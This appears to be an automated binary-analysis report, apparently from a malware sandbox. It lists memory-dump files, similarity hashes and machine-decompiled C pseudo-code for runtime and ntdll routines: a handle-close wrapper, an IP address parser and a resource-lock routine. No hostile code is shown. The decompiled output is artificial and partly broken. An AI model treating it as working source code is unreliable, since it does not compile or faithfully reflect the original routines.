Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: 01b686058315b1a6d03843651c87880e787137fa004a72d4937e02a188c1abed
Instruction ID: 3189309a9ed8af18215a5cbe5e6d5940eb83ac165bb499ce3c7a33bd8813e358
Opcode Fuzzy Hash: 01b686058315b1a6d03843651c87880e787137fa004a72d4937e02a188c1abed
Instruction Fuzzy Hash: B7419B7164061D7ADF20AB94DC85FEBB3BCAB94704F0005E5B505A61C1E771AB858F61

Uniqueness

Uniqueness Score: -1.00%

Function 012B8E23, Relevance: 13.6, APIs: 9, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B8E23(void* __eflags, signed int _a4) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				intOrPtr _t18;
				void* _t22;
				signed int _t35;
				long _t40;

				_t13 = E012BA5A7(_t12);
				if(_t13 >= 0) {
					_t35 = _a4;
					if(E012C0132(_t35) == 0xffffffff) {
						L10:
						_t40 = 0;
					} else {
						_t18 =  *0x12d2f60; // 0x0
						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
								goto L8;
							} else {
								goto L7;
							}
						} else {
							L7:
							_t22 = E012C0132(2);
							if(E012C0132(1) == _t22) {
								goto L10;
							} else {
								L8:
								if(CloseHandle(E012C0132(_t35)) != 0) {
									goto L10;
								} else {
									_t40 = GetLastError();
								}
							}
						}
					}
					E012C00AC(_t35);
					 *((char*)( *((intOrPtr*)(0x12d2f60 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
					if(_t40 == 0) {
						_t16 = 0;
					} else {
						_t16 = E012B8EDE(_t40) | 0xffffffff;
					}
					return _t16;
				} else {
					return _t13 | 0xffffffff;
				}
			}

APIs

__ioinit.LIBCMT ref: 012B8E26

Part of subcall function 012BA5A7: InitOnceExecuteOnce.KERNEL32(012D229C,012BA5E2,00000000,00000000), ref: 012BA5B5

__get_osfhandle.LIBCMT ref: 012B8E3A
__get_osfhandle.LIBCMT ref: 012B8E65
__get_osfhandle.LIBCMT ref: 012B8E6E
__get_osfhandle.LIBCMT ref: 012B8E7A
CloseHandle.KERNEL32(00000000), ref: 012B8E81
GetLastError.KERNEL32(?,012C41AB,012B2656,?,?,?,?,?,?,?,012B2656,00000000,00000109), ref: 012B8E8B
__free_osfhnd.LIBCMT ref: 012B8E98
__dosmaperr.LIBCMT ref: 012B8EBA

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
String ID:
API String ID: 974577687-0
Opcode ID: b59d7f50651dfb5a22ebea98653f03946e08a9cbc7555d3e86b3723a3f36e38d
Instruction ID: 5a4ccc31b58e9953a4dd256f83aa7b35bb62f4e7a8ba0c4b35beed0eb4674fdd
Opcode Fuzzy Hash: b59d7f50651dfb5a22ebea98653f03946e08a9cbc7555d3e86b3723a3f36e38d
Instruction Fuzzy Hash: 0611E532A712529AD626663CA88C7FEBB4D9F91BB4F15434DFB1C8B1C2EAB4D4418250

Uniqueness

Uniqueness Score: -1.00%

Function 00950B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00950B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00928980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0091DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00950CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00950CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E009506BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E009506BA(_t135, _t178) == 0 || E00950A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00950CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00950CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E009506BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E009506BA(_t124, _t142) == 0 || E00950A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x00950b21
0x00950b24
0x00950b27
0x00950b2a
0x00950b2d
0x00950b30
0x00950b33
0x00950b36
0x00950b39
0x00950b3e
0x00950c65
0x00950c68
0x00950c6a
0x00950c6f
0x0097eb42
0x00000000
0x00000000
0x0097eb48
0x0097eb48
0x00950c75
0x00950c7a
0x0097eb54
0x00000000
0x00000000
0x00000000
0x0097eb5a
0x00950c80
0x00950c84
0x0097eb98
0x00000000
0x00000000
0x0097eba6
0x00950cb8
0x00950cba
0x00950cd3
0x00950cda
0x00950ce4
0x00950ce9
0x00000000
0x00950cec
0x00950c8c
0x0097eb63
0x00000000
0x00000000
0x0097eb70
0x0097eb75
0x0097eb7d
0x00000000
0x00000000
0x0097eb8c
0x00000000
0x0097eb8c
0x00950c96
0x00000000
0x00000000
0x00950ca2
0x00950cac
0x00950cb4
0x00000000
0x00000000
0x00950b44
0x00950b47
0x00950b49
0x00000000
0x00000000
0x00950b4f
0x00950b50
0x00000000
0x00000000
0x00950b56
0x00950b62
0x00950b7c
0x00950bac
0x00950a0f
0x0097eaaa
0x00000000
0x0097eac4
0x0097eac4
0x00950bd0
0x00950bd0
0x00950bd4
0x00950bd9
0x00000000
0x00000000
0x00950bdb
0x00950be0
0x0097eb0e
0x00950a1a
0x00000000
0x00950a1a
0x0097eb1a
0x0097eb1f
0x0097eb27
0x00000000
0x00000000
0x0097eb36
0x00000000
0x0097eb36
0x00950bea
0x00000000
0x00000000
0x00950bf6
0x00950c00
0x00950c03
0x00950c0b
0x00000000
0x00950c0b
0x0097eaaa
0x00000000
0x00950a15
0x00950bb6
0x00000000
0x00950bc6
0x00950bc6
0x00950bcb
0x00950c15
0x00000000
0x00000000
0x00950c1d
0x00950c20
0x00950c21
0x00950c24
0x00950c24
0x00950c26
0x00000000
0x00950c26
0x00950bcd
0x00000000
0x00950bcd
0x00950b89
0x00950b89
0x00950b90
0x00000000
0x00000000
0x00950b96
0x00000000
0x00950b96
0x00950a04
0x00950a04
0x00950b9a
0x00950b9a
0x00950b9b
0x00950b9f
0x00000000
0x00000000
0x00000000
0x00950ba5
0x00950ac7
0x00950aca
0x0097eacf
0x00000000
0x0097eade
0x0097eade
0x0097eae3
0x00000000
0x00000000
0x0097eaf3
0x0097eaf6
0x0097eaf7
0x0097eafe
0x0097eb01
0x00000000
0x0097eb01
0x0097eacf
0x00950ad0
0x00950ad4
0x00000000
0x00000000
0x00950ada
0x00950ae6
0x00950c34
0x00000000
0x00950c47
0x00950c49
0x00950c4a
0x00950c4e
0x00950c51
0x00950c54
0x00950c57
0x00950c5a
0x00000000
0x00000000
0x00000000
0x00950c60
0x00950afb
0x00950afe
0x00950b02
0x00950b05
0x00950b08
0x00000000
0x00950b08
0x00950ae6
0x00950b44
0x009509f8
0x009509f8
0x009509f9
0x00000000
0x00000000
0x0097eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 00950BF6
__fassign.LIBCMT ref: 00950CA2

Strings

., xrefs: 00950A0C
:, xrefs: 00950AC7
:, xrefs: 00950BA9

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: c83b3e10928f01a0504d1eaaeace5ad2196d40e8ed0cab7208212e9123c3becd
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 0CA1B271D0030ADFDF24CF6AC8457BEB7B8AF96306F24896ADC82A7241D7345A49CB51

Uniqueness

Uniqueness Score: -1.00%

Function 012B3AB0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 203COMMON

Download Yara Rule

APIs

Part of subcall function 012B6EF1: __fsopen.LIBCMT ref: 012B6EFC

_swscanf.LIBCMT ref: 012B3B48

Part of subcall function 012B7021: _vfscanf.LIBCMT ref: 012B7035

_fprintf.LIBCMT ref: 012B3DA6

Strings

ACCOUNT.DAT, xrefs: 012B3ABE
TEMP.DAT, xrefs: 012B3AE2
%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 012B3D9A
%s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 012B3B3D

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: __fsopen_fprintf_swscanf_vfscanf
String ID: %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$ACCOUNT.DAT$TEMP.DAT
API String ID: 1563022539-2055742014
Opcode ID: 464f3e07da33180f7d6408c1e7b89420f66039c6c15c6d3bb64867925b62be2a
Instruction ID: 04070d8658fe7caa6cc0088e16577b2d69cc0565077de1bcf034786b9080b3a0
Opcode Fuzzy Hash: 464f3e07da33180f7d6408c1e7b89420f66039c6c15c6d3bb64867925b62be2a
Instruction Fuzzy Hash: 9B91D472C105599FCB09CFA8D995BEEFBB9FF45300F0486AEE006BA184EA7456858F50

Uniqueness

Uniqueness Score: -1.00%

Function 00950554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00950554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009f01c0;
									_push(_t144);
									_push(0);
									_t51 = E0090F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00954FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00963F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00963F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0099217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00963F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00953915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009f01c0;
												_push(_t138);
												_push(0);
												_t58 = E0090F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00954FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00963F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00963F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0099217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00963F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00953915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00935384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0090F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00953915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0090F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00953915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0090F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00953915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00935329(_t110, _t138);
																_t69 = E009353A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}

0x0095055a
0x0095055d
0x00950563
0x00950566
0x009505d8
0x009505e2
0x009505e5
0x00000000
0x009505e7
0x009505e7
0x009505ea
0x009505f3
0x009505f3
0x00950568
0x00950568
0x00950568
0x00950569
0x00950569
0x00950569
0x0095056b
0x00000000
0x00000000
0x0097217f
0x00972183
0x0097225b
0x0097225f
0x00972189
0x0097218c
0x0097218f
0x00972194
0x00972199
0x0097219d
0x009721a0
0x009721a2
0x009721ce
0x009721ce
0x009721ce
0x009721d0
0x009721d6
0x009721de
0x009721e2
0x009721e8
0x009721e9
0x009721ec
0x009721f1
0x009721f6
0x00000000
0x00000000
0x009721f8
0x009721fb
0x00972206
0x0097220b
0x0097220c
0x00972217
0x00972226
0x0097222b
0x0097222c
0x0097222f
0x00972232
0x00972235
0x00972235
0x0097223a
0x0097223f
0x00972241
0x00972243
0x00972248
0x00972248
0x0097224d
0x0097224f
0x00972262
0x00972263
0x00972268
0x00972269
0x00972269
0x00972269
0x0097226d
0x00000000
0x00000000
0x00972276
0x00972279
0x0097227e
0x00972283
0x00972287
0x0097228a
0x0097228d
0x0097228f
0x009722bc
0x009722bc
0x009722bc
0x009722be
0x009722c4
0x009722cc
0x009722d0
0x009722d6
0x009722d7
0x009722da
0x009722df
0x009722e4
0x00000000
0x00000000
0x009722e6
0x009722e9
0x009722f4
0x009722f9
0x009722fa
0x00972305
0x00972314
0x00972319
0x0097231a
0x0097231d
0x00972320
0x00972323
0x00972323
0x00972328
0x0097232d
0x0097232f
0x00972331
0x00972336
0x00972336
0x0097233b
0x0097233d
0x00972350
0x00972351
0x00972356
0x00972359
0x00972359
0x0097235b
0x0097235d
0x00935367
0x0093536b
0x00935372
0x00000000
0x00000000
0x00000000
0x00000000
0x00972363
0x00972363
0x00972369
0x0097236a
0x0097236c
0x00972371
0x00972373
0x00000000
0x00972379
0x00972379
0x0097237a
0x0097237f
0x0097237f
0x00972385
0x00972386
0x00972389
0x0097238e
0x00972390
0x00935378
0x0093537c
0x00972396
0x00972396
0x00972397
0x0097239c
0x009723a2
0x009723a3
0x009723a6
0x009723ab
0x009723ad
0x00000000
0x009723b3
0x009723b3
0x009723b4
0x009723b9
0x009723ba
0x009723ba
0x009723bc
0x009723bf
0x00000000
0x00000000
0x00969153
0x00969158
0x0096915a
0x0096915e
0x00969160
0x00000000
0x00969166
0x00969166
0x00969171
0x00969176
0x00969176
0x00000000
0x00969160
0x009723c6
0x009723ce
0x009723d7
0x009723d7
0x009723ad
0x00972390
0x00972373
0x0097233f
0x0097233f
0x00000000
0x0097233f
0x00972291
0x00972291
0x00972293
0x00972295
0x0097229a
0x009722a1
0x009722a3
0x009722a7
0x009722a9
0x00000000
0x00000000
0x009722ab
0x009722ad
0x009722af
0x00000000
0x00000000
0x00000000
0x009722af
0x009722b1
0x009722b4
0x009722b4
0x009722b6
0x009353be
0x009353be
0x009353be
0x009353c0
0x00000000
0x00000000
0x009353cb
0x009353ce
0x009353d0
0x009353d4
0x009353d6
0x00000000
0x009353d8
0x009353e3
0x009353ea
0x009353ea
0x00000000
0x009353d6
0x00000000
0x00000000
0x00000000
0x00000000
0x009722b6
0x00000000
0x0097228f
0x00972349
0x0097234d
0x00972251
0x00972251
0x00000000
0x00972251
0x009721a4
0x009721a4
0x009721a6
0x009721a8
0x009721ac
0x009721b6
0x009721b8
0x009721bc
0x009721be
0x00000000
0x00000000
0x009721c0
0x009721c2
0x009721c4
0x00000000
0x00000000
0x00000000
0x009721c4
0x009721c6
0x009721c6
0x009721c8
0x00000000
0x00000000
0x00000000
0x00000000
0x009721c8
0x009721a2
0x00000000
0x00972183
0x0095057b
0x0095057d
0x00950581
0x00950583
0x00972178
0x00000000
0x00950589
0x0095058f
0x0095058f
0x00950583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00972206

Strings

RTL: Re-Waiting, xrefs: 0097223A, 00972328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009722FC
RTL: Resource at %p, xrefs: 0097221D, 0097230B
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 0097220E

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: a49bb86294a84375fe13ad321e4524786f80ad17bfb7e71ac7956e2621d0bc3c
Instruction ID: 34a331877e6935b1f84647ee9600a8807eb2a515549d6a15d48567cc22dc07bc
Opcode Fuzzy Hash: a49bb86294a84375fe13ad321e4524786f80ad17bfb7e71ac7956e2621d0bc3c
Instruction Fuzzy Hash: DB511B727542056FEB14CB19CC81FA633ADAFD8711F21C229FD59DB286E971EC418790

Uniqueness

Uniqueness Score: -1.00%

Function 012B1380, Relevance: 10.6, APIs: 7, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 76%

